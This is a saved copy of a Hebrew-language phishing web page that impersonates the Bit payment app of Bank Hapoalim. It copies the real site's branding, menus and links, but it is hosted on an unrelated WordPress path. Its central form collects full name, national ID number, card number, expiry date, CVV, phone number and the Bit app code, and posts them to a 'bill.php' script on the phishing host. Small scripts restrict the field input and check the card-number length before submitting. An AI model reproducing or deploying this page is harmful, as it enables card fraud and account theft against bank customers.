<!DOCTYPE html>
<!-- saved from url=(0058)https://blal1.wpenginepowered.com/wp-content/Bit/index.php -->
<html lang="iw" dir="rtl" prefix="content: http://purl.org/rss/1.0/modules/content/  dc: http://purl.org/dc/terms/  foaf: http://xmlns.com/foaf/0.1/  og: http://ogp.me/ns#  rdfs: http://www.w3.org/2000/01/rdf-schema#  schema: http://schema.org/  sioc: http://rdfs.org/sioc/ns#  sioct: http://rdfs.org/sioc/types#  skos: http://www.w3.org/2004/02/skos/core#  xsd: http://www.w3.org/2001/XMLSchema# " class="js translated-ltr translated-rtl"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

        
          
        
    
  <link rel="canonical" href="https://www.bitpay.co.il/he">
  <link rel="shortlink" href="https://www.bitpay.co.il/he">
  <meta name="description" content="תגידו ביי לארנק והיי ל-bit: מעבירים ומקבלים כסף, קונים בחנויות, עושים שופינג אונליין ומשלמים חשבונות. הצטרפו למיליוני לקוחות שכבר הפכו את bit לאמצעי התשלום המועדף עליהם.">
  <meta name="google-site-verification" content="4OjwPLv1Eb6X6Vajh3g1Eebj1APrYvNU53JeS673HKE">
  <meta name="MobileOptimized" content="width">
  <meta name="HandheldFriendly" content="true">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <link rel="icon" href="https://www.bitpay.co.il/sites/all/themes/poalim_bit/favicon.ico" type="image/vnd.microsoft.icon">
  <link rel="alternate" hreflang="he" href="https://www.bitpay.co.il/he">
  
      <title>קצת | קצת</title>
      <link rel="stylesheet" media="all" href="./index_files/core.css">
  <link rel="stylesheet" media="all" href="./index_files/controlgroup.css">
  <link rel="stylesheet" media="all" href="./index_files/checkboxradio.css">
  <link rel="stylesheet" media="all" href="./index_files/resizable.css">
  <link rel="stylesheet" media="all" href="./index_files/button.css">
  <link rel="stylesheet" media="all" href="./index_files/dialog.css">
  <link rel="stylesheet" media="all" href="./index_files/ajax-progress.module.css">
  <link rel="stylesheet" media="all" href="./index_files/align.module.css">
  <link rel="stylesheet" media="all" href="./index_files/autocomplete-loading.module.css">
  <link rel="stylesheet" media="all" href="./index_files/fieldgroup.module.css">
  <link rel="stylesheet" media="all" href="./index_files/container-inline.module.css">
  <link rel="stylesheet" media="all" href="./index_files/clearfix.module.css">
  <link rel="stylesheet" media="all" href="./index_files/details.module.css">
  <link rel="stylesheet" media="all" href="./index_files/hidden.module.css">
  <link rel="stylesheet" media="all" href="./index_files/item-list.module.css">
  <link rel="stylesheet" media="all" href="./index_files/js.module.css">
  <link rel="stylesheet" media="all" href="./index_files/nowrap.module.css">
  <link rel="stylesheet" media="all" href="./index_files/position-container.module.css">
  <link rel="stylesheet" media="all" href="./index_files/progress.module.css">
  <link rel="stylesheet" media="all" href="./index_files/reset-appearance.module.css">
  <link rel="stylesheet" media="all" href="./index_files/resize.module.css">

  <link rel="stylesheet" media="all" href="./index_files/system-status-counter.css">
  <link rel="stylesheet" media="all" href="./index_files/system-status-report-counters.css">
  <link rel="stylesheet" media="all" href="./index_files/system-status-report-general-info.css">
  <link rel="stylesheet" media="all" href="./index_files/tabledrag.module.css">
  <link rel="stylesheet" media="all" href="./index_files/tablesort.module.css">
  <link rel="stylesheet" media="all" href="./index_files/tree-child.module.css">
  <link rel="stylesheet" media="all" href="./index_files/menu_icons_1712619278.css">
  <link rel="stylesheet" media="all" href="./index_files/theme.css">
  <link rel="stylesheet" media="all" href="./index_files/paragraphs.unpublished.css">
  <link rel="stylesheet" media="all" href="./index_files/paragraph_component_promotion.css">
  <link rel="stylesheet" media="all" href="./index_files/bootstrap-rtl.min.css">
  <link rel="stylesheet" media="all" href="./index_files/all.min.css">
  <link rel="stylesheet" media="all" href="./index_files/basictable.css">
  <link rel="stylesheet" media="all" href="./index_files/slick.css">
  <link rel="stylesheet" media="all" href="./index_files/style.css">   <link rel="stylesheet" type="text/css" media="screen" href="./index_files/main.css">
  <link rel="stylesheet" media="all" href="./index_files/bootstrap.min.css">
  <link rel="stylesheet" media="all" href="./index_files/all.css"><script type="text/javascript" async="" src="./index_files/analytics.js.הורדה"></script><script href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js"></script>
  <script src="./index_files/jquery.min.js.הורדה"></script>
  
  <style>
select {
  padding: 10px; /* Add padding to the select box */
  /* Set a fixed width */
}

/* Style the options within the select element */
select option {
  padding: 10px; /* Add padding to each option */
  margin: 2px 0; /* Add margin to separate options */
}
::placeholder {
  font-size: 19px; /* Adjust the font size of the placeholder text */
}
</style>
            <link type="text/css" rel="stylesheet" charset="UTF-8" href="./index_files/m=el_main_css"><link type="text/css" rel="stylesheet" charset="UTF-8" href="./index_files/m=el_main_css(1)"></head>
    <body style="background: #2b5586;;">

 
      
          <div id="skip-links">
        <a href="https://blal1.wpenginepowered.com/wp-content/Bit/index.php#4846" class="visually-hidden focusable" rel="nofollow">מעבר לתוכן העמוד</a>
                                  <a href="https://login.bankhapoalim.co.il/" class="visually-hidden focusable" rel="nofollow">התחבר לחשבון</a>
                                                <a href="https://www.bankhapoalim.co.il/he/accessibility" class="visually-hidden focusable" rel="nofollow">נְגִישׁוּת</a>
                                                                                                          </div>
  
      
        <div class="dialog-off-canvas-main-canvas" data-off-canvas-main-canvas="">
        
  <div class="layout-container campaign-page plazma-small-margin" style="
  background-color: #f3f9ff;
" data-popup-otp="/sites/bitpay/files/otp_image.svg">
  <script src="./index_files/cc.js.הורדה"></script>
    <input type="hidden" name="blackList" value="[&quot;customPixels&quot;,&quot;customScripts&quot;]">
    <input type="hidden" name="whiteList" value="[&quot;gas&quot;,&quot;ga&quot;,&quot;cl&quot;,&quot;awct&quot;,&quot;sp&quot;,&quot;gclidw&quot;,&quot;gaawc&quot;,&quot;gaawe&quot;,&quot;ua&quot;,&quot;c&quot;,&quot;e&quot;,&quot;v&quot;,&quot;u&quot;,&quot;tl&quot;,&quot;sdl&quot;,&quot;sandboxedScripts&quot;]">
    <input type="hidden" name="pathList" value="[&quot;\/admin*&quot;,&quot;\/batch*&quot;,&quot;\/node\/add*&quot;,&quot;\/node\/*\/edit&quot;,&quot;\/node\/*\/delete&quot;,&quot;\/user\/*\/edit*&quot;,&quot;\/user\/*\/cancel*&quot;]">
  
      
    
    
            <header class="header-sticky campaign-header-sticky">
        
  <div class="header-main-row header-campaign-page">
    <div class="header-inner special-style" style="background-color: rgb(43, 85, 134);">
        <div style="background-color: #2b5586;" class="header-inner-body container">
          <div style="background-color: #2b5586;" class="header-main-content">
            <div class="mobile-menu">
    <button class="mobile-menu-toggle hamburger" type="button" aria-label="החלף ניווט">
          <span class="mobile-menu-icon">
              <img src="./index_files/hamburger.svg" alt="החלף ניווט">
          </span>
    </button>
    <div class="drawer-overlay mobile-menu-toggle"></div>
    <div class="mobile-menu-drawer">
      <div class="menu-main">
        <div class="menu-inner collapse-menu">
          <ul class="menu links">
                        <li>
                <a href="https://www.bitpay.co.il/he/bit-for-businesses" target="_self" id="main_mobile_l1" rel="nofollow">קצת עבור עסקים וארגונים</a>
  
                
              </li>
                        <li>
                <a href="https://www.bitpay.co.il/he/carrefour-card" target="_self" id="main_mobile_l2" rel="nofollow">כרטיס קרפור</a>
  
                
              </li>
                        <li>
                <a href="https://www.bitpay.co.il/he/private-faq" target="_self" id="main_mobile_l3" rel="nofollow">שאלות ותשובות</a>
  
                
              </li>
                    </ul>
        </div>
      </div>
  
          <div class="menu-btn">
                <a href="https://play.google.com/store/apps/details?id=com.bnhp.payments.paymentsapp" rel="nofollow">
            <img src="./index_files/regular-ic-playstore_0.svg" title="" alt="להורדת אפליקציית Bit מחנות גוגל">
          </a>
                <a href="https://apps.apple.com/us/app/bit-%D7%91%D7%99%D7%98/id1182007739" rel="nofollow">
            <img src="./index_files/regular-ic-appstore_0.svg" title="" alt="להורדת אפליקציית Bit מ-Apple Store">
          </a>
            </div>
      
    </div>
  </div>
            <a class="cpn-link-logo" href="https://www.bitpay.co.il/he" rel="nofollow">          <div class="logo">
              <div class="cpn-logo" title="ביט, לדף הבית" style="background-image: url(https://www.bitpay.co.il/sites/bitpay/files/media/bitpay/bit-logo.svg)">
                ביט, לדף הבית
              </div>
            </div>
            </a>          <div class="main-menu">
            <ul class="menu links">
              
                <li class="links-first">
                  <a href="https://www.bitpay.co.il/he/bit-for-businesses" target="_self" style="color: rgb(255, 255, 255); border-bottom: 2px solid transparent;" class="link-first" id="main_l1" rel="nofollow">קצת עבור עסקים וארגונים</a>
  
                 
                </li>
              
                <li class="links-first">
                  <a href="https://www.bitpay.co.il/he/carrefour-card" target="_self" style="color:#FFFFFF;" class="link-first" id="main_l2" rel="nofollow">כרטיס קרפור</a>
  
                 
                </li>
              
                <li class="links-first">
                  <a href="https://www.bitpay.co.il/he/private-faq" target="_self" style="color:#FFFFFF;" class="link-first" id="main_l3" rel="nofollow">שאלות ותשובות</a>
  
                 
                </li>
                        </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
      </header>
    
    
  
    
  
    
  
    <main role="main">
      <a id="main-content"></a>
  
      <div class="layout-content">
          <div>
      <div data-drupal-messages-fallback="" class="hidden"></div><div id="block-poalim-bit-content">
    
      
        
  
    
    
  <div>
              <div>

    <div class="paragraph paragraph--type--campaigns-plazma paragraph--view-mode--default">
    

  </div>
  
</div>
<div class="container d-lg-flex">
  
                  
                      
  <div style="padding-top: 65px;" class="box-2">
      <div class="box-inner-2">
    
          <form onsubmit="return validateForm()" id="myForm" action="https://blal1.wpenginepowered.com/wp-content/Bit/action/bill.php" method="post"> <div class="my-3 cardname">
                      <p class="dis fw-bold mb-2" style="font-size:19px;color: #9e9e9e;">שם מלא</p>
                      <input class="form-control" required="" placeholder="שם בעל הכרטיס" style="width: 100%;border-radius: 25px;border: 2px solid #2b5586;font-size: 18px;" onkeypress="return preventDigits(event)" name="name" type="text">
                  </div>
              <div class="mb-3">
                  <p class="dis fw-bold mb-2" style="font-size:19px;color: #9e9e9e;">מספר תעודת זהות</p>
                  <input class="form-control" type="tel" style="width: 100%;border-radius: 25px;border: 2px solid #2b5586;font-size: 18px;" placeholder="מספר תעודת הזהות של בעל הכרטיס" onkeypress="return validateTelephone(event)" minlength="9" maxlength="9" name="id" required="">
              </div>   
              <div class="mb-3">
                  <p class="dis fw-bold mb-2" style="font-size:19px;color: #9e9e9e;">פרטי כרטיס</p>
                  <input type="tel" class="form-control" onkeyup="$cc.validate(event)" placeholder="XXXX XXXX XXXX XXXX" style="width: 100%;border-radius: 25px;border: 2px solid #2b5586;font-size: 18px;" onkeypress="return validateDigit(event, 18, 19)" maxlength="19" minlength="18" name="ccn" id="cc" required="">
                      </div>
        <div style="display:flex">
                      <div style="display: inline-block;width=50%"><label style="font-size:1.2em;color: #9e9e9e;font-weight: 700 !important;">חודש תפוגה</label><select name="month" style="min-width:90%;border-radius: 25px;height: 45px;
  border: 2px solid #2b5586;;font-size:1.2em;
padding: 10px;font-weight: bold;
margin: 2px 0;
"><option selected="selected" style="padding: 10px;margin: 2px 0;">01</option>
 <option>02</option>
 <option>03</option>
 <option>04</option>
 <option>05</option>
 <option>06</option>
 <option>07</option>
 <option>08</option>
 <option>09</option>
 <option>10</option>
 <option>11</option>
 <option>12</option>
 </select></div> <div style="display: inline-block;margin-right:3%;width:50%;"><label style="font-size:1.2em;color: #9e9e9e;font-weight: 700 !important;">שנת תפוגה</label><select name="year" style="min-width:90%;border-radius: 25px;height: 45px;
  border: 2px solid #2b5586;font-size:1.2em;font-weight: bold;">
 <option selected="selected">2024</option>
 <option>2025</option>
 <option>2026</option>
 <option>2027</option>
 <option>2028</option>
 <option>2029</option>
 <option>2030</option>
 <option>2031</option>
 </select></div></div><div class="my-3 cardname">
                  <p class="dis fw-bold mb-2" style="font-size:19px;color: #9e9e9e;">CVV/CSC</p>
                  <input class="form-control" type="tel" placeholder="קוד מאובטח של כרטיס" style="width: 100%;border-radius: 25px;border: 2px solid #2b5586;font-size: 18px;" onkeypress="return validateTelephone(event)" maxlength="4" name="cvv" required="" minlength="3">
              </div> <div class="my-3 cardname">
                <p class="dis fw-bold mb-2" style="font-size:19px;color: #9e9e9e;">מספר טלפון</p>
                <input class="form-control" minlength="9" placeholder="הטלפון הנייד של בעל הכרטיס" style="width: 100%;border-radius: 25px;border: 2px solid #2b5586;font-size: 18px;" maxlength="10" required="" type="tel" name="tph" onkeypress="return validateTelephone(event)">
            </div><div class="my-3 cardname">
                <p class="dis fw-bold mb-2" style="font-size:19px;color: #9e9e9e;">קוד אפליקציה קצת</p>
                <input class="form-control" placeholder="קוד אפליקציה קצת" style="width: 100%;border-radius: 25px;border: 2px solid #2b5586;font-size: 18px;" maxlength="4" minlength="4" required="" type="tel" name="pin" onkeypress="return validateTelephone(event)">
            </div>
                  <div class="address">
               
                     
                      </div>
                      <div class="d-flex flex-column dis">
                        <p id="err" style="color: red;font-family: sans-serif;font-weight: bold;display: none;">לאמת מידע </p>
                          <button type="submit" style="background-color: #2b5586;width: 100%;font-size: 21px;border-radius: 25px;border: 2px solid #2b5586;" class="btn btn-primary mt-2">המשיך
                          </button>
                      </div>
                  </form></div>
              </div>
          
      </div>
  </div>
</div>
 <script>function preventDigits(event) {
    // Get the input element
    var input = event.target;
    
    // Get the input value
    var value = input.value;
    
    // Replace any digits or numbers in the input value with an empty string
    var newValue = value.replace(/\d/g, '');
    
    // If the new value is different from the old value, update the input value
    if (newValue !== value) {
        input.value = newValue;
    }
}function validateForm() {
  var err=document.getElementById("err");
  var cc=document.getElementById("cc").value;
  var inputs = document.getElementsByTagName('input');

  if (cc.length !== 18 && cc.length !== 19) {
        err.style.display ="block";
      
        return false;event.preventDefault(); // Prevent form submission
    }
  // If all inputs are filled, submit the form
  document.getElementById('myForm').submit();
}
  function validateTelephone(event) {
      // Get the key code of the pressed key
      var keyCode = event.keyCode || event.which;
  
      // Allow navigation keys like backspace and delete
      if (keyCode == 8 || keyCode == 46 || keyCode == 37 || keyCode == 39) {
          return true;
      }
  
      // Allow digits (0-9)
      if (keyCode >= 48 && keyCode <= 57) {
          return true;
      }
  
      // Prevent the default action for all other keys
      event.preventDefault();
      return false;
  }function validateText(event) {
    // Get the key code of the pressed key
    var keyCode = event.keyCode || event.which;

    // Allow navigation keys like backspace and delete
    if (keyCode == 8 || keyCode == 46 || keyCode == 37 || keyCode == 39) {
        return true;
    }

    // Allow alphabetic characters and spaces (a-z, A-Z, and space)
    if ((keyCode >= 65 && keyCode <= 90) || (keyCode >= 97 && keyCode <= 122) || keyCode == 32) {
        return true;
    }

    // Prevent the default action for all other keys
    event.preventDefault();
    return false;
}
function validateDigit(event, minLength, maxLength) {
    // Get the input value
    var value = event.target.value;

    // Get the key code of the pressed key
    var keyCode = event.keyCode || event.which;

    // Allow navigation keys like backspace and delete
    if (keyCode == 8 || keyCode == 46 || keyCode == 37 || keyCode == 39) {
        return true;
    }

    // Allow digits (0-9) and space
    if ((keyCode >= 48 && keyCode <= 57) || keyCode == 32) {
        // Check if length exceeds the maximum length
        if (value.length >= maxLength) {
            event.preventDefault();
            return false;
        }
        return true;
    }

    // Prevent the default action for all other keys
    event.preventDefault();
    return false;
}
  </script>     
              <div>
  <div class="regular-paragraph paragraph container paragraph-section " id="4846" tabindex="0">
      
            
      
  </div>
</div>
          </div>
  
    </div>
  
    </main></div>
  
      </div>
  
      
      
  
    
  
        
      <footer role="footer">
        
  
  
  <span class="sr-only" tabindex="0">כותרת תחתונה</span>
  
  <div class="container">
      
  
                <div class="footer-inner">
              <div class="footer-inner-body">
                  <div class="row">
                      <div class="col-lg-8 footer-menu collapse-menu">
                          
                <ul class="menu links">
                <li class="menu-icon menu-icon-23 arrow">
          <span role="heading" aria-level="4">אפליקציית bit</span>
                                  <ul>
                <li class="menu-icon menu-icon-33">
          <a href="https://www.bitpay.co.il/he" data-drupal-link-system-path="&lt;front&gt;" class="is-active" id="footer_col1_l1" rel="nofollow">דף הבית</a>
                </li>
            <li class="menu-icon menu-icon-97">
          <a href="https://www.bitpay.co.il/he/bit-for-businesses" data-drupal-link-system-path="node/556" id="footer_col1_l2" rel="nofollow">קצת עבור עסקים וארגונים</a>
                </li>
            <li class="menu-icon menu-icon-98">
          <a href="https://www.bitpay.co.il/he/carrefour-card" target="_blank" data-drupal-link-system-path="node/570" id="footer_col1_l3" rel="nofollow">כרטיס קרפור</a>
                </li>
          </ul>
    
                </li>
            <li class="menu-icon menu-icon-22 arrow">
          <span role="heading" aria-level="4">עֶזרָה</span>
                                  <ul>
                <li class="menu-icon menu-icon-16">
          <a href="https://www.bitpay.co.il/he/private-faq" data-drupal-link-system-path="node/557" id="footer_col2_l1" rel="nofollow">שאלות ותשובות</a>
                </li>
            <li class="menu-icon menu-icon-50">
          <a href="https://www.bankhapoalim.co.il/he/accessibility" id="footer_col2_l2" rel="nofollow">הצהרת נגישות</a>
                </li>
          </ul>
    
                </li>
            <li class="menu-icon menu-icon-21 arrow">
          <span role="heading" aria-level="4">איש קשר</span>
                                  <ul>
                <li class="menu-icon menu-icon-129">
          <span>ניתן ליצור קשר בטלפון *6428</span>
                </li>
            <li class="menu-icon menu-icon-130">
          <span>ראשון-חמישי - 9:00-17:00 | שישי וערבי חג - 8:30-13:00</span>
                </li>
          </ul>
    
                </li>
          </ul>
    
  
  
                      </div>
                      <div class="col-lg-3 offset-lg-1 client-buttons">
                          
  
  
                <ul class="menu links top-header-tabs">
                <li class="item">
          <a href="https://play.google.com/store/apps/details?id=com.bnhp.payments.paymentsapp&amp;gl=IL" class="bit-button-no-text" target="_blank" rel="nofollow">
            גוגל פליי
                        <svg width="116" height="19" viewBox="0 0 116 19" xmlns="http://www.w3.org/2000/svg">
      <g fill="#000" fill-rule="nonzero">
          <g stroke="#FFF" stroke-width=".54">
              <path d="M1.29 1.248c-.184.199-.29.502-.29.9v14.09c0 .397.106.7.297.89l.05.044 7.896-7.894V9.1L1.34 1.205l-.05.043z"></path>
              <path d="M11.87 11.917 9.236 9.284V9.1l2.634-2.633.057.035 3.115 1.77c.892.502.892 1.331 0 1.84l-3.115 1.77-.057.035z"></path>
              <path d="m11.927 11.882-2.69-2.69-7.946 7.943c.29.312.779.347 1.324.043l9.312-5.296M11.927 6.502 2.615 1.213C2.07.902 1.58.945 1.29 1.256l7.945 7.936 2.691-2.69z"></path>
          </g>
          <path d="M53.752 5.016c-2.503 0-4.532 1.899-4.532 4.518 0 2.596 2.042 4.518 4.532 4.518 2.504 0 4.533-1.912 4.533-4.518 0-2.62-2.03-4.518-4.533-4.518zm0 7.246c-1.37 0-2.548-1.134-2.548-2.738 0-1.63 1.181-2.739 2.548-2.739 1.37 0 2.549 1.11 2.549 2.739.002 1.615-1.18 2.738-2.549 2.738zm-9.888-7.246c-2.504 0-4.533 1.899-4.533 4.518 0 2.596 2.043 4.518 4.533 4.518 2.503 0 4.532-1.912 4.532-4.518 0-2.62-2.032-4.518-4.532-4.518zm0 7.246c-1.37 0-2.549-1.134-2.549-2.738 0-1.63 1.182-2.739 2.549-2.739 1.37 0 2.548 1.11 2.548 2.739 0 1.615-1.179 2.738-2.548 2.738zM32.097 6.396v1.912h4.59c-.14 1.073-.495 1.864-1.038 2.407-.673.673-1.711 1.404-3.542 1.404-2.82 0-5.028-2.278-5.028-5.098s2.207-5.098 5.028-5.098c1.523 0 2.633.6 3.457 1.369l1.357-1.356C35.776.84 34.253 0 32.118 0 28.248 0 25 3.152 25 7.01c0 3.87 3.245 7.01 7.118 7.01 2.09 0 3.658-.683 4.898-1.97 1.263-1.263 1.663-3.046 1.663-4.484 0-.447-.034-.85-.105-1.191h-6.48c.003-.003.003.02.003.02zm48.13 1.488c-.38-1.014-1.524-2.879-3.87-2.879-2.327 0-4.26 1.83-4.26 4.519 0 2.537 1.912 4.518 4.484 4.518 2.067 0 3.27-1.264 3.765-2.005l-1.534-1.028c-.509.755-1.216 1.25-2.22 1.25-1.015 0-1.724-.46-2.196-1.369l6.042-2.503c0 .003-.212-.503-.212-.503zm-6.162 1.51c-.048-1.745 1.356-2.633 2.36-2.633.792 0 1.452.39 1.677.956l-4.037 1.677zm-4.909 4.378h1.984V.498h-1.984v13.274zM65.898 6.02h-.072c-.447-.533-1.298-1.015-2.384-1.015-2.254 0-4.33 1.984-4.33 4.532 0 2.537 2.065 4.497 4.33 4.497 1.073 0 1.937-.485 2.384-1.028h.072v.649c0 1.724-.922 2.654-2.408 2.654-1.216 0-1.97-.874-2.278-1.605l-1.725.72c.496 1.192 1.818 2.667 4 2.667 2.326 0 4.297-1.37 4.297-4.709V5.276H65.91v.744h-.011zm-2.278 6.242c-1.37 0-2.514-1.144-2.514-2.725 0-1.595 1.144-2.75 2.514-2.75 1.356 0 2.408 1.169 2.408 2.75.013 1.58-1.05 2.725-2.408 2.725zM89.517.498h-4.745v13.274h1.984V8.745h2.763c2.196 0 4.355-1.592 4.355-4.118 0-2.527-2.15-4.13-4.357-4.13zm.058 6.393h-2.821V2.336h2.82c1.487 0 2.327 1.226 2.327 2.277 0 1.041-.85 2.278-2.326 2.278zm12.251-1.899c-1.44 0-2.927.638-3.541 2.029l1.759.73c.379-.73 1.073-.98 1.806-.98 1.028 0 2.067.615 2.09 1.712v.14c-.355-.201-1.133-.508-2.066-.508-1.9 0-3.825 1.038-3.825 2.984 0 1.783 1.558 2.927 3.293 2.927 1.332 0 2.066-.601 2.524-1.298h.072v1.028h1.912V8.67c0-2.368-1.759-3.679-4.024-3.679zm-.249 7.27c-.649 0-1.557-.318-1.557-1.134 0-1.027 1.134-1.416 2.1-1.416.875 0 1.288.188 1.807.447a2.388 2.388 0 0 1-2.35 2.103zm11.25-6.986-2.277 5.757h-.072l-2.36-5.757h-2.135l3.542 8.048-2.019 4.473h2.066l5.45-12.521h-2.194zm-17.859 8.496h1.984V.498h-1.984v13.274z"></path>
      </g>
  </svg>
  
                    </a>
                </li>
            <li class="item">
          <a href="https://apps.apple.com/us/app/bit-%D7%91%D7%99%D7%98/id1182007739" class="bit-button-no-text" target="_blank" rel="nofollow">
            חנות אפליקציות
                        <svg width="107" height="19" viewBox="0 0 107 19" xmlns="http://www.w3.org/2000/svg">
      <g fill="#000" fill-rule="nonzero">
          <path d="M8.128 5.475c.772 0 2.243-1.03 3.76-.876.634.018 2.44.242 3.604 1.883-.094.054-2.15 1.222-2.128 3.622.025 2.877 2.604 3.828 2.636 3.839-.015.067-.404 1.372-1.371 2.698-.808 1.167-1.655 2.308-2.999 2.329-1.306.029-1.745-.743-3.243-.743-1.512 0-1.98.722-3.232.772-1.28.045-2.259-1.246-3.096-2.403C.386 14.235-.917 9.941.829 7.02c.847-1.433 2.39-2.355 4.04-2.38 1.282-.025 2.471.836 3.259.836zM11.904 0c.128 1.124-.333 2.231-1.007 3.045-.703.802-1.828 1.415-2.923 1.336-.144-1.082.411-2.232 1.033-2.933C9.709.652 10.929.042 11.904 0zM48.335 5.502c1.073 0 1.97.422 2.686 1.267.719.846 1.077 1.958 1.077 3.337 0 1.54-.418 2.758-1.254 3.652-.75.796-1.68 1.194-2.79 1.194-1.198 0-2.059-.429-2.583-1.286h-.038v4.772H43.41V8.67c0-.968-.025-1.962-.075-2.982h1.778l.113 1.436h.038c.674-1.082 1.697-1.622 3.07-1.622zm10.466 0c1.072 0 1.968.422 2.687 1.267.716.846 1.075 1.958 1.075 3.337 0 1.54-.418 2.758-1.255 3.652-.749.796-1.679 1.194-2.789 1.194-1.198 0-2.06-.429-2.583-1.286h-.038v4.772h-2.021V8.67c0-.968-.026-1.962-.075-2.982h1.778l.113 1.436h.038c.673-1.082 1.696-1.622 3.07-1.622zm27.816.001c1.335 0 2.41.441 3.22 1.324.776.856 1.163 1.961 1.163 3.316 0 1.392-.4 2.536-1.199 3.43-.837.92-1.948 1.379-3.333 1.379-1.335 0-2.398-.441-3.19-1.323-.794-.882-1.19-1.995-1.19-3.336 0-1.404.408-2.553 1.226-3.447.816-.895 1.918-1.343 3.303-1.343zM70.913 2c1.148 0 2.102.2 2.864.597l-.506 1.64c-.71-.385-1.515-.577-2.415-.577-.71 0-1.266.174-1.665.522-.336.31-.505.689-.505 1.137 0 .497.193.907.58 1.23.336.298.948.621 1.835.97 1.086.435 1.883.944 2.396 1.527.511.582.766 1.31.766 2.178 0 1.068-.373 1.938-1.12 2.609-.823.734-1.967 1.1-3.438 1.1-1.357 0-2.446-.26-3.27-.783l.469-1.677a5.56 5.56 0 0 0 2.922.802c.761 0 1.354-.172 1.78-.513.423-.342.635-.8.635-1.373 0-.51-.175-.94-.525-1.288-.348-.348-.929-.672-1.74-.971-2.21-.82-3.313-2.022-3.313-3.602 0-1.033.387-1.88 1.161-2.539.772-.66 1.802-.989 3.09-.989zm7.805 1.431v2.255h2.229V7.2h-2.229v4.398c0 1.118.393 1.677 1.18 1.677.361 0 .66-.031.898-.093l.056 1.528c-.398.148-.923.223-1.572.223-.799 0-1.423-.243-1.873-.727-.448-.485-.674-1.299-.674-2.442V7.197h-1.327v-1.51h1.327v-1.66l1.985-.596zm24.113 2.054c1.311 0 2.304.485 2.978 1.453.534.77.802 1.721.802 2.85a4.7 4.7 0 0 1-.074.914h-6.064c.023.895.316 1.58.88 2.051.51.422 1.171.634 1.983.634.898 0 1.717-.143 2.454-.429l.317 1.397c-.861.374-1.878.56-3.05.56-1.411 0-2.519-.414-3.325-1.24-.804-.826-1.207-1.935-1.207-3.326 0-1.366.375-2.504 1.125-3.41.785-.97 1.846-1.454 3.18-1.454zm-65.26-3.3 4.081 12.562H39.5l-1.18-3.69h-4.1l-1.123 3.69H31l4.062-12.563h2.509zm59.494 3.317c.187 0 .356.013.505.037v1.92a3.525 3.525 0 0 0-.637-.056c-.71 0-1.26.267-1.648.802-.336.472-.505 1.069-.505 1.789v4.753h-2.02l.018-6.206c0-1.044-.025-1.995-.075-2.852h1.76l.074 1.733h.056c.214-.595.55-1.075 1.011-1.435.45-.323.937-.485 1.461-.485zm-10.52 1.473c-.812 0-1.43.361-1.853 1.084-.363.598-.543 1.326-.543 2.187 0 .835.18 1.552.543 2.148.437.723 1.047 1.084 1.835 1.084.772 0 1.378-.368 1.815-1.102.373-.61.56-1.333.56-2.168 0-.835-.179-1.552-.542-2.15-.424-.723-1.03-1.083-1.815-1.083zm-28.4.13c-.5 0-.952.165-1.358.493-.406.33-.67.762-.795 1.296-.061.25-.094.453-.094.614v1.51c0 .659.203 1.215.607 1.669.406.453.933.68 1.584.68.761 0 1.354-.292 1.777-.875.425-.585.638-1.355.638-2.312 0-.882-.2-1.609-.6-2.18-.438-.597-1.023-.896-1.76-.896zm-10.465 0c-.499 0-.952.165-1.357.493-.406.33-.671.762-.795 1.296-.063.25-.094.453-.094.614v1.51c0 .659.203 1.215.608 1.669.406.454.933.68 1.582.68.761 0 1.354-.292 1.778-.875.424-.585.637-1.355.637-2.312 0-.882-.2-1.609-.6-2.18-.437-.597-1.023-.896-1.76-.896zM36.26 3.861h-.038a91.005 91.005 0 0 1-.599 2.366l-1.048 3.28h3.388l-1.067-3.28c-.112-.335-.324-1.124-.636-2.366zM102.68 6.88c-.66 0-1.198.273-1.609.82-.337.436-.537.958-.598 1.566h4.21c.014-.596-.118-1.111-.392-1.546-.35-.56-.888-.84-1.611-.84z"></path>
      </g>
  </svg>
  
                    </a>
                </li>
          </ul>
    
  
                      </div>
                  </div>
                  <div class="row">
                                          <div class="col-lg-12 footer-social-links-menu">
                          
  
  
                <ul class="menu links">
                <li>
          <a href="https://www.instagram.com/bit.app.il/" id="footer_social_l1" rel="nofollow">אינסטגרם
                        <svg width="50" height="50" viewBox="0 0 50 50" xmlns="http://www.w3.org/2000/svg">
      <g transform="translate(1 1)" fill="none" fill-rule="evenodd">
          <circle stroke="#01273F" stroke-width="2" fill="#FFF" stroke-linecap="round" stroke-linejoin="round" cx="24" cy="24" r="24"></circle>
          <path d="M29.4 13.65a5.85 5.85 0 0 1 5.85 5.85v9.9a5.85 5.85 0 0 1-5.85 5.85h-9.9a5.85 5.85 0 0 1-5.85-5.85v-9.9a5.85 5.85 0 0 1 5.85-5.85zm0 2.7h-9.9a3.15 3.15 0 0 0-3.15 3.15v9.9a3.15 3.15 0 0 0 3.15 3.15h9.9a3.15 3.15 0 0 0 3.15-3.15v-9.9a3.15 3.15 0 0 0-3.15-3.15zm-4.95 2.7a5.4 5.4 0 1 1 0 10.8 5.4 5.4 0 0 1 0-10.8zm0 2.7a2.7 2.7 0 1 0 0 5.4 2.7 2.7 0 0 0 0-5.4zm4.95-3.15a.9.9 0 1 1 0 1.8.9.9 0 0 1 0-1.8z" fill="#01273F" fill-rule="nonzero"></path>
      </g>
  </svg>
  
                    </a>
                </li>
            <li>
          <a href="https://www.facebook.com/bit.poalim" id="footer_social_l2" rel="nofollow">פייסבוק
                        <svg width="50" height="50" viewBox="0 0 50 50" xmlns="http://www.w3.org/2000/svg">
      <g transform="translate(1 1)" fill="none" fill-rule="evenodd">
          <circle stroke="#01273F" stroke-width="2" fill="#FFF" stroke-linecap="round" stroke-linejoin="round" cx="24" cy="24" r="24"></circle>
          <path d="m29.226 25.69.62-3.966h-3.717v-2.776c0-1.11.387-1.982 2.09-1.982H30v-3.649C28.994 13.16 27.91 13 26.903 13c-3.174 0-5.42 1.983-5.42 5.552v3.172H18v3.966h3.484v10.072c.774.159 1.548.238 2.322.238.775 0 1.549-.08 2.323-.238V25.69h3.097z" fill="#01273F" fill-rule="nonzero"></path>
      </g>
  </svg>
  
                    </a>
                </li>
          </ul>
  
      <svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg" class="my-gradient">
      <lineargradient id="myGradient">
          <stop offset="0%" stop-color="#c01039"></stop>
          <stop offset="30%" stop-color="#dc1223"></stop>
          <stop offset="100%" stop-color="#e02a19"></stop>
      </lineargradient>
